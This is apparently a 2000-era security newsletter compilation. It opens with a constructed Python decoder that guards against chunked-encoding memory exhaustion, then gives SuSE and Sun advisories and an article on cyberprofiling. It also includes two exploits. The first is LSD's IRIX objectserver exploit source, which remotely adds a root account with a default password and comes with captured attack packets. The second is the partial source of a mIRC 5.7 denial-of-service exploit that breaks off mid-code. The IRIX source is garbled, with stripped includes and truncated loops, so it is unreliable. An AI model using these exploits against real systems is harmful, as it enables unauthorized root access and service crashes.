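The iis-chunked-encoding-dos entry is a resource-exhaustion pattern rather than a parsing bug: the server reserves memory for a chunk size the client has merely declared, and the client then never sends it. The decoder below is an added example, not Microsoft's or IIS's code; it parses an HTTP/1.1 chunked body and refuses a declared chunk size above a limit before setting anything aside for it, which is the check the bulletin's patch amounts to. The limits, the sample bodies and the `try_decode` wrapper are constructed for the example.

```python
# Constructed limits; a real server would take these from its configuration.
MAX_CHUNK_SIZE = 64 * 1024          # largest single chunk accepted
MAX_BODY_SIZE = 1024 * 1024         # largest decoded body accepted
MAX_SIZE_LINE = 32                  # longest chunk-size line (hex digits + extensions)


class ChunkedError(ValueError):
    """Raised for malformed, truncated or over-limit chunked bodies."""


def decode_chunked(data, max_chunk=MAX_CHUNK_SIZE, max_body=MAX_BODY_SIZE):
    """Decode one HTTP/1.1 chunked body from `data` (bytes).

    Returns (body, remaining): the decoded body and whatever bytes followed
    the terminating zero-length chunk and its trailers. Every declared chunk
    size is checked against max_chunk, and the running total against
    max_body, before any memory is set aside for the chunk, so a client that
    announces a huge chunk and then stalls costs the server only this parse.
    """
    body = bytearray()
    pos = 0
    while True:
        # The chunk-size line must end within MAX_SIZE_LINE bytes; a client
        # cannot make the server buffer an endless "size" either.
        eol = data.find(b"\r\n", pos, pos + MAX_SIZE_LINE + 2)
        if eol < 0:
            raise ChunkedError("chunk-size line missing, truncated or too long")
        size_field = data[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        try:
            size = int(size_field.decode("ascii"), 16)
        except (UnicodeDecodeError, ValueError):
            raise ChunkedError("bad chunk size %r" % size_field)
        if size < 0 or size > max_chunk:
            raise ChunkedError("declared chunk of %d bytes exceeds %d" % (size, max_chunk))
        if len(body) + size > max_body:
            raise ChunkedError("body would exceed %d bytes" % max_body)
        pos = eol + 2
        if size == 0:
            # last-chunk: skip optional trailer lines up to the empty line.
            while True:
                eol = data.find(b"\r\n", pos)
                if eol < 0:
                    raise ChunkedError("truncated trailer section")
                line, pos = data[pos:eol], eol + 2
                if not line:
                    return bytes(body), data[pos:]
        if len(data) < pos + size + 2:
            raise ChunkedError("truncated chunk data")
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedError("chunk data not followed by CRLF")
        body += data[pos:pos + size]
        pos += size + 2


def try_decode(data):
    """decode_chunked for callers that simply drop a bad request: None on error."""
    try:
        return decode_chunked(data)
    except ChunkedError:
        return None


# Constructed sample bodies (not from the bulletin).
WELL_FORMED = b"4\r\nWiki\r\n5\r\npedia\r\nE\r\n in\r\n\r\nchunks.\r\n0\r\n\r\nNEXT"
OVERSIZED = b"7FFFFFFF\r\n"          # declares ~2 GiB and sends nothing: rejected at once

if __name__ == "__main__":
    print(decode_chunked(WELL_FORMED))
    print(try_decode(OVERSIZED))
```

This decoder works on a complete buffer, which is enough to show the check; a streaming server applies the same two limits as each size line arrives and additionally puts a read timeout on the socket, because a chunk that is within the limit but never finishes still ties up a connection until the timeout fires.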
About Internet Security Systems

Internet Security Systems (ISS) is the leading global provider of security management solutions for the Internet. By providing industry-leading SAFEsuite* security software, ePatrol* remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to its customers and partners, protecting digital assets and ensuring safe and uninterrupted e-business. ISS' security management solutions protect more than 5,500 customers worldwide including 21 of the 25 largest U.S. commercial banks, 10 of the largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBOOjlnzRfJiV99eG9AQHSOgQAj9D2ufzmwt8RyBRDZLzDCtdfTcG9KiaZ
AbQfghGaav5IlYrSUEj2GFHj1KeLb2o8OCCnzVo5T1YFoIKC3L6ZxQ9q0Gsi2Pfv
KXYGtYmNcOzQ5WIjUuBm1T2/ZXcL3cPYkfcMzyIKp0iddhx7noxuHJOffP1QTzm6
/hbYgL+fum8=
=bxur
-----END PGP SIGNATURE-----

@HWA

255.0 PSS: suse kreatecd root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                        SuSE Security Announcement

        Package:                  kreatecd < 0.3.8b
        Date:                     Wed, 5 Apr 2000 20:00:12 GMT
        Affected SuSE versions:   6.4
        Vulnerability Type:       local root compromise
        SuSE default package:     no
        Other affected systems:   all unix systems using kreatecd

______________________________________________________________________________

A security hole was discovered in the package mentioned above.
Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue.

Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.

_____________________________________________________________________________

1. Problem Description

   kreatecd is a KDE tool used to burn cd-roms. An exploitable buffer overflow was found in this tool.

2. Impact

   Local users may gain root privilege.

3. Solution

   Update the package from our FTP server, or remove the suid bit from this tool. ("chmod u-s /opt/kde/bin/kreatecd")

______________________________________________________________________________

Please verify these md5 checksums of the updates before installing:

742ed57b8bfb022d4e3755e417612272  ftp://ftp.suse.com/pub/suse/axp/update/6.4/kpa1/kreatecd-0.3.8b-0.alpha.rpm
09cbe9a08cf2b0d5d5d0b1963c3edbcd  ftp://ftp.suse.com/pub/suse/i386/update/6.4/kpa1/kreatecd-0.3.8b-0.i386.rpm
e59c71fa6ae5cf59af9aa1bdce89b015  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kpa1/kreatecd-0.3.8b-0.ppc.rpm

______________________________________________________________________________

You can find updates on our ftp-Server:

  ftp://ftp.suse.com/pub/suse/i386/update   for Intel processors
  ftp://ftp.suse.com/pub/suse/axp/update    for Alpha processors

or try the following web pages for a list of mirrors:

  http://www.suse.de/ftp.html
  http://www.suse.com/ftp_new.html

Our webpage for patches:
  http://www.suse.de/patches/index.html

Our webpage for security announcements:
  http://www.suse.de/security

If you want to report vulnerabilities, please contact security@suse.de

______________________________________________________________________________

SuSE has got two
free security mailing list services to which any interested party may subscribe:

suse-security@suse.com
        - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

suse-security-announce@suse.com
        - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.

To subscribe to the list, send a message to:

To remove your address from the list, send a message to:

Send mail to the following for info and FAQ for this list:

_____________________________________________________________________________

This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way.

Type Bits/KeyID    Date       User ID
pub  2048/3D25D3D9 1999/03/06 SuSE Security Team

- ------BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12Cg==
=pIeS
- ------END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBOOucPney5gA9JdPZAQH4Tgf/fH0SmQlfvdhowia3LXKFeoTOA5EMn027
ldofK35EZLui4KpBwyxBvdGZXG1fBpCaO3SackdNxD1PzfTJk7ykjch9vmaD2Zq8
lbGoHqF1y823GzSvPu5VXaY2M3W8HbxWFGnc/Yh/v7ST6x0FVJAoFMImVkdWS7gZ
TaEtyBeZBSTvcV/fzA7m3tFqoaCbCMWJTKBj9ENM4u8wM8GrCT+JQa6r/BzBb3VF
QzAs6/dA/3PPc5k3qd7Zaf/9z6K6OMJaMoIr21w67D9M2XYb2luUlyjyrd1H3MGU
iodDDcVYRUsGNBlDjTI42XdFXpgNWH6QtIbmjBsT6x/MdkeOTDlpMg==
=2H9o
-----END PGP SIGNATURE-----

--
To unsubscribe, e-mail: suse-security-announce-unsubscribe@suse.com
For additional commands, e-mail: suse-security-announce-help@suse.com

@HWA

256.0 PSS: irix object server remote root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

At 08:52 AM 3/29/2000 -0500, Howard wrote:
>Since the patches are now officially released, I feel I can finally
>release the details of the SGI objectserver vulnerability. This
>vulnerability was initially reported to CERT and SGI Security on
>October 6, 1997. A beta version of patch 2849 was provided in
>February 1998.
>

Hi. As a legitimate function of my work I routinely archive and catalog vulnerability information and exploit code. In the interest of full-disclosure and in possibly helping system administrators evaluate the security of their SGI boxen, I am attaching the remote exploit for Irix objectserver (udp 5135).

There are big problems with the US government right now - if you are doing security work (let alone cracking!) be advised that things are getting seriously fucked. See the "L0phtcrack as a burglary tool" article? See all these kids getting PRISON sentences for typing? The government isn't playing by sane rules. Be prepared. Be awake!
Marcy /* Copyright (c) July 1997 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */ /* Last Stage of Delirium */ /* */ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LSD. */ /* SGI objectserver "account" exploit */ /* Remotely adds account to the IRIX system. */ /* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, */ /* which was supposed to be free from this bug (SGI 19960101-01-PX). */ /* The vulnerability "was corrected" on 6.2 systems but */ /* SGI guys fucked up the job and it still can be exploited. */ /* The same considers patched 5.x,6.0.1 and 6.1 systems */ /* where SGI released patches DONT work. */ /* The only difference is that root account creation is blocked. */ /* */ /* usage: ob_account ipaddr [-u username] [-i userid] [-p] */ /* -i specify userid (other than 0) */ /* -u change the default added username */ /* -p probe if there's the objectserver running */ /* */ /* default account added : lsd */ /* default password : m4c10r4! */ /* default user home directory : /tmp/.new */ /* default userid : 0 */ #include #include #include #include #include #include #include #include #define E if(errno) perror(""); struct iovec iov[2]; struct msghdr msg; char buf1[1024],buf2[1024]; int sck; unsigned long adr; void show_msg(){ char *p,*p1; int i,j,c,d; c=0; printf("%04x ",iov[0].iov_len); p=(char*)iov[0].iov_base; for(i=0;i1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i>8; dodaj_two[offset++]=userid&0xff; } else dodaj_two[offset++]=0x00; memcpy(&dodaj_two[offset],&dodaj_five[0],39); offset+=39; dodaj_one[10]=offset>>8; dodaj_one[11]=offset&0xff; new_account(offset); } } /* end g23 exploit post */ __________________________________________________ Do You Yahoo!? Talk to your friends online with Yahoo! Messenger. http://im.yahoo.com Sender: Bugtraq List From: "Howard M. 
Kash III"
Subject: Objectserver vulnerability
X-To: BUGTRAQ@securityfocus.com

Since the patches are now officially released, I feel I can finally release the details of the SGI objectserver vulnerability. This vulnerability was initially reported to CERT and SGI Security on October 6, 1997. A beta version of patch 2849 was provided in February 1998.

Howard

----- Forwarded message # 1:

Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: cert@cert.org, security-alert@sgi.com
Subject: URGENT - new SGI vulnerability

[Internal error while calling pgp, raw data follows]
-----BEGIN PGP SIGNED MESSAGE-----

URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT

SGI objectserver vulnerability allows remote users to create accounts.

Yesterday two of our hosts were compromised by an (as far as I could determine) unknown, unpatched bug in SGI's objectserver. The attack consisted of sending UDP packets to port 5135 (see below). The result was a non-root account being added to the system. The two compromised hosts were running IRIX 6.2, but the vulnerability may affect other versions of IRIX. The vulnerability does not appear to give root access directly, as the attackers used other IRIX vulnerabilities to gain root access after logging into the new account.

Attached are the UDP packets exchanged between the attacking host (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP addresses have been masked to protect the guilty - I mean innocent until proven guilty. The result of this sequence of packets is the following line added to /etc/passwd:

gueust:x:5002:20:LsD:/tmp/.new:/bin/csh

An entry must also be added to /etc/shadow since the attacker then logs into the new account with a password.

As a temporary measure we have blocked all traffic to port 5135 at our gateway.

Howard Kash
U.S. Army Research Lab

- ------------------------------------------------------------------------

TCP and UDP headers have been separated out.
I've decoded some of the packet contents into its ascii equivalent below the line.

16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
        4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
        tttt tttt 112a 140f 003c 6516 0001 0000
        0001 0000 0000 0024 0000 0000 2103 0043
        000a 000a 0101 3b01 6e00 0080 4301 0118
        0b01 013b 016e 0102 0103 0001 0107 0101

16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
        4500 007b 0644 0000 3a11 26dc tttt tttt
        aaaa aaaa 140f 112a 0067 0d37 0001 0186
        0001 0000 0000 004f 0000 0000 2903 0043
        000a 0080 4300 8043 0105 0a01 013b 0178
        0469 0a79 9a01 330a 0101 3b01 7804 690a
        799a 0138 0a01 013b 0178 0469 0a79 9a01
        020a 0101 3b01 7804 690a 799a 0103 0a01
        013b 0178 0469 0a79 9a01 04

16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
        4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
        tttt tttt 112a 140f 0140 a1b2 0001 0000
        0001 0000 0000 0128 0000 0000 1c03 0043
        0201 1d0a 0101 3b01 7804 690a 799a 0102
        0a01 013b 0178 0000 8043 0110 170b 0101
        3b01 6e01 0101 0943 0106 6775 6575 7374
                                   g u  e u  s t
        170b 0101 3b01 0201 0101 0943 0103 4c73
                                             L s
        4417 0b01 013b 016e 0106 0109 4300 170b
        D
        0101 3b01 6e01 0701 0943 0017 0b01 013b
        0102 0103 0109 4300 170b 0101 3b01 6e01
        0901 0943 0017 0b01 013b 016e 010d 0109
        4300 170b 0101 3b01 6e01 1001 0943 0017
        0b01 013b 016e 010a 0109 4300 170b 0101
        3b01 6e01 0e01 0301 0917 0b01 013b 016e
        0104 0109 4301 0d61 6b46 4a64 7865 6e4b
        6e79 532e 170b 0101 3b01 6e01 1101 0943
        0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
             / t  m p  / .  n e  w
        016e 0112 0109 4301 0470 6f6f 7417 0b01
        013b 016e 0102 0103 0017 0b01 013b 016e
        0113 0109 4301 082f 6269 6e2f 6373 6817
                           / b  i n  / c  s h
        0b01 013b 016e 010f 0109 4301 074c 7344
        2f43 5444

16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
        4500 0045 0646 0000 3a11 2710 tttt tttt
        aaaa aaaa 140f 112a 0031 0ef5 0001 0187
        0001 0000 0000 0019 0000 0000 2503 0043
        0201 1d0a 0080 4300 0a01 013b 0178 0469
        0a79 9a01 39

16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
        4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
        tttt tttt 112f 140f 003c 6511 0001 0000
        0001 0000 0000 0024 0000 0000 2103 0043
        000a 000a 0101 3b01 6e00 0080 4301 0118
        0b01 013b 016e 0102 0103 0001 0107 0101

16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
        4500 0088 0669 0000 3a11 26aa tttt tttt
        aaaa aaaa 140f 112f 0074 3f4f 0001 0188
        0001 0000 0000 005c 0000 0000 2903 0043
        000a 0080 4300 8043 0106 0a01 013b 0178
        0469 0a79 9a01 330a 0101 3b01 7804 690a
        799a 0138 0a01 013b 0178 0469 0a79 9a01
        390a 0101 3b01 7804 690a 799a 0102 0a01
        013b 0178 0469 0a79 9a01 030a 0101 3b01
        7804 690a 799a 0104

16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
        4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
        tttt tttt 112f 140f 0142 1399 0001 0000
        0001 0000 0000 012a 0000 0000 1c03 0043
        0201 1d0a 0101 3b01 7804 690a 799a 0102
        0a01 013b 0178 0000 8043 0110 170b 0101
        3b01 6e01 0101 0943 0106 6775 6575 7374
        170b 0101 3b01 0201 0101 0943 0103 4c73
        4417 0b01 013b 016e 0106 0109 4300 170b
        0101 3b01 6e01 0701 0943 0017 0b01 013b
        0102 0103 0109 4300 170b 0101 3b01 6e01
        0901 0943 0017 0b01 013b 016e 010d 0109
        4300 170b 0101 3b01 6e01 1001 0943 0017
        0b01 013b 016e 010a 0109 4300 170b 0101
        3b01 6e01 0e01 0301 0917 0b01 013b 016e
        0104 0109 4301 0d61 6b46 4a64 7865 6e4b
        6e79 532e 170b 0101 3b01 6e01 1101 0943
        0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
        016e 0112 0109 4301 0475 7365 7217 0b01
        013b 016e 0102 0103 0213 8a17 0b01 013b
        016e 0113 0109 4301 082f 6269 6e2f 6373
        6817 0b01 013b 016e 010f 0109 4301 074c
        7344 2f43 5444

16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
        4500 0045 0671 0000 3a11 26e5 tttt tttt
        aaaa aaaa 140f 112f 0031 0dee 0001 0189
        0001 0000 0000 0019 0000 0000 2503 0043
        0201 1d0a 0080 4300 0a01 013b 0178 0469
        0a79 9a01 3a

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----

----- End of forwarded messages

@HWA

257.0 PSS: Sun bind advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

________________________________________________________________________________
Sun Microsystems, Inc. Security Bulletin

Bulletin Number: #00194
Date:            March 29, 2000
Cross-Ref:       CERT Advisory CA-99-14
Title:           BIND
________________________________________________________________________________

The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction.
________________________________________________________________________________

1. Bulletin Topics

   Sun announces the release of patches for Solaris(tm) 7 which relate to four vulnerabilities in BIND reported in CERT Advisory CA-99-14.

   Sun recommends that you install the patches listed in section 4 immediately on systems running Solaris 7 with Sun's implementation of BIND.

2. Who is Affected

   Vulnerable:     Solaris 7 running Sun's implementation of BIND
   Not vulnerable: All other supported versions of Solaris.

3. Understanding the Vulnerabilities

   The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. CERT Advisory CA-99-14 describes six vulnerabilities in certain versions of BIND. Solaris 7 is vulnerable to the following four vulnerabilities reported in the CERT advisory.

   Vulnerability #3: the "so_linger bug"
      Remote attackers may degrade the performance of named.

   Vulnerability #4: the "fdmax bug"
      Remote attackers may cause named to crash.

   Vulnerability #5: the "maxdname bug"
      Remote attackers may cause named to crash.

   Vulnerability #6: the "naptr bug"
      Remote attackers may cause named to crash.

   The CERT advisory CA-99-14 is available at:

      ftp://info.cert.org/pub/cert_advisories/CA-99-14-bind.txt

   No other supported versions of Solaris (including Solaris 8) are affected by any of the six vulnerabilities reported in the CERT advisory.

4. List of Patches

   The following patches are available in relation to the above problems.

   Solaris version     Patch ID
   _______________     _________
   Solaris 7 (SPARC)   107018-02
                       106938-03
   Solaris 7 (Intel)   107019-02
                       106939-03

_______________________________________________________________________________

APPENDICES

A.
   Patches listed in this bulletin are available to all Sun customers at:

      http://sunsolve.sun.com/securitypatch

B. Checksums for the patches listed in this bulletin are available at:

      ftp://sunsolve.sun.com/pub/patches/CHECKSUMS

C. Sun security bulletins are available at:

      http://sunsolve.sun.com/security

D. Sun Security Coordination Team's PGP key is available at:

      http://sunsolve.sun.com/pgpkey.txt

E. To report or inquire about a security problem with Sun software, contact one or more of the following:

   - Your local Sun Solution Center
   - Your representative computer security response team, such as CERT
   - Sun Security Coordination Team. Send email to:

        security-alert@sun.com

F. To receive information or subscribe to our CWS (Customer Warning System) mailing list, send email to:

        security-alert@sun.com

   with a subject line (not body) containing one of the following commands:

   Command          Information Returned/Action Taken
   _______          _________________________________

   help             An explanation of how to get information

   key              Sun Security Coordination Team's PGP key

   list             A list of current security topics

   query [topic]    The email is treated as an inquiry and is forwarded to the Security Coordination Team

   report [topic]   The email is treated as a security report and is forwarded to the Security Coordination Team. Please encrypt sensitive mail using Sun Security Coordination Team's PGP key

   send topic       A short status summary or bulletin. For example, to retrieve a Security Bulletin #00138, supply the following in the subject line (not body):

                       send #138

   subscribe        Sender is added to our mailing list. To subscribe, supply the following in the subject line (not body):

                       subscribe cws your-email-address

                    Note that your-email-address should be substituted by your email address.

   unsubscribe      Sender is removed from the CWS mailing list.

________________________________________________________________________________

Copyright 2000 Sun Microsystems, Inc. All rights reserved.
Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries.

This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOOJQKrdzzzOFBFjJAQHbJAQAmcXk9+7E0mB5ybqEK9eKjbtqxEfkwcqF
sGMNYLMpcQEM67uWzPfZzn5BB+FMKfYJjF0cZlBOMgt7zVWakIZxq7NoW3Qu3XV6
GLjoe0gqNAyuDrDZBiHinPhnFh5Url4OK7T9+DTrorJry7KrmD5t+YRjEUN3Nqro
MDlDgR9fAu0=
=cDAV
-----END PGP SIGNATURE-----

@HWA

258.0 Cyberprofiling
~~~~~~~~~~~~~~~~~~~~

Source: http://www.infosecuritymag.com/

DIGITAL FORENSICS SIDEBAR • CYBERPROFILING

CyberCrime Watch
Computers don't commit electronic breaches. People do.

BY TERRY M. GUDAITIS

Contrary to depictions in Hollywood movies, those responsible for the majority of cybercrimes, hacking incidents and cyberdeviant acts cannot be "profiled" as a certain demographic type. Cyberstalkers and online child pornographers do not look deviant; in fact, they are as diverse as the employee population of any company. Consider, for example, two recent perpetrators: the former head of Disney's Go Network, Patrick Naughton, who has been charged with trying to meet a 13-year-old girl he encountered in an Internet chat room, allegedly with the intent to have sex with her; and Harvard Divinity School's former dean, Ronald Thiemann, who was dismissed for storing child pornography on his office PC.

Many infosecurity practitioners think about their work within a purely technical context: firewalls, routers, switches, monitoring software and so on. This is particularly the case when it comes to cyberforensics.
While it's clear that a technical approach to forensics is critical to uncovering evidence from computer-based crimes, the tendency to focus on technology alone comes at the expense of an equally important activity: cybercrime profiling.

One aspect of infosec that is consistently overlooked, underestimated or incorrectly defined is the human dimension. Humans are the catalysts behind the keyboards and modems used to conduct computer crimes. Consequently, anyone who has responsibility for systems security, incident response teams, business continuity planning and IT hiring must understand the implications of online behavior and computer use beyond purely technical considerations. They must understand how to identify cyberdeviant behavior, how to identify the perpetrators, how to protect the innocent and how to reduce organizational vulnerability.

What Is Cyberprofiling?

Profiling is the process by which a crime scene is observed, evaluated and assessed from behavioral, psychological and criminological perspectives in order to provide sociological insight into the offending individual(s). The concept behind criminal profiling is that weapons do not commit the crimes--people do. Put in a technical context, computers don't hack--hackers do. The individuals who are penetrating systems, launching distributed denial-of-service attacks and defacing Web pages are the problem, not the advancing technologies and the availability of hacking scripts on the Internet. Profiling provides the necessary means to assess and understand the perpetrators of these electronic crimes.

For decades, criminal or psychological profiling has been used by law enforcement and the intelligence community to assess criminals, groups, organizations, cultures and, most notably, serial killers. Analogously, most hackers do not hack just once. They have a pattern, an MO and a "signature."
The use of criminal profiling in a technical setting is an effective tool to narrow the suspect pool, provide insight into the motivation of the perpetrator, possibly predict the hacker's next move (which, in recent notable cases, involved attempted extortion) and, ultimately, assist in the interview and interrogation process of an identified perpetrator.

When assessing a conventional crime scene, investigators enlist the assistance of relevant professionals, including demolitions experts, medical examiners, fingerprint examiners, ballistics experts and psychological profilers. Cyberprofiling involves a similar process, with technical experts, systems administrators, Web programmers, Unix experts, Windows gurus and antivirus specialists. The added tool of profiling centers on the behavior of the perpetrator.

When used in conjunction with technical forensics tools, cyberprofiling helps you…

  • Narrow the suspect pool
      o Identify single or multiple perpetrators
  • Determine an organization's vulnerabilities
  • Predict perpetrator behavior
  • Mitigate an incident
  • Supplement the interview or interrogation process
  • Assist in the evidence collection and prosecution
  • Provide suggestions and follow-up post-incident

Profiling Myths and Legends

The depiction of criminal and psychological profiling in movies and on TV often misrepresents what profiling really is...and how a profile is generated.

  • Profiling is not psychological testing; and psychological testing does not derive a profile.
  • Profiling is not a static process; people are dynamic and distinct, and the process of profiling must be dynamic and evolving.
  • Profiling is not inductive. It is not studying data, creating a template and applying that template to criminal incidents.
  • Profiling is conducted on a case-by-case basis. The profile is derived deductively from that case-specific data.

The most important thing to realize is that every case is distinct: There is no one hacker profile!
In the never-ending battle against computer crime, companies have invested substantial capital in advanced computer forensics tools and intrusion detection technologies. At the same time, organizations have spent a great deal of money educating employees on combating hostile work environments, discrimination and sexual harassment. For cyberforensics to be a complete science, the same level of emphasis and funding must be devoted to the "human side" of computer crime investigation.

TERRY M. GUDAITIS, Ph.D. (terry.gudaitis@cip.saic.com), is a criminal profiler in the High-Tech Criminal Investigations unit of Global Integrity Corp.

@HWA

259.0 mIRC 5.7 Exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crashes the mIRC client by sending it malformed server messages (the program listens on port 6667 and plays the part of the IRC server).

/* diemirc.c - mIRC 5.7 denial of service exploits.
   (c) Chopsui-cide/MmM '00
   The Mad Midget Mafia - http://midgets.box.sk/

   Disclaimer: this program is proof of concept code, and is not intended to
   be used maliciously. By using this code, you take all responsibility for
   any damage incurred by the use of it.

   This program listens on port 6667 for incoming connections, then crashes
   mIRC using the exploit you choose.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <winsock.h>

#define LISTEN_PORT 6667
#define TARGET_NICK "Chopsui-cide"

void listen_sock(int sock, int port);
void die(char *message);
int poll_for_connect(int listensock);
int select_sploit(void);
void exploit1(int s);
void exploit2(int s);
void exploit3(int s);
void exploit4(int s);

int main(void)
{
   int ls;
   int c;
   WSADATA wsaData;
   WORD wVersionRequested;

   wVersionRequested = MAKEWORD(1, 1);
   if (WSAStartup(wVersionRequested, &wsaData) < 0)
      die("Unable to initialise Winsock.");
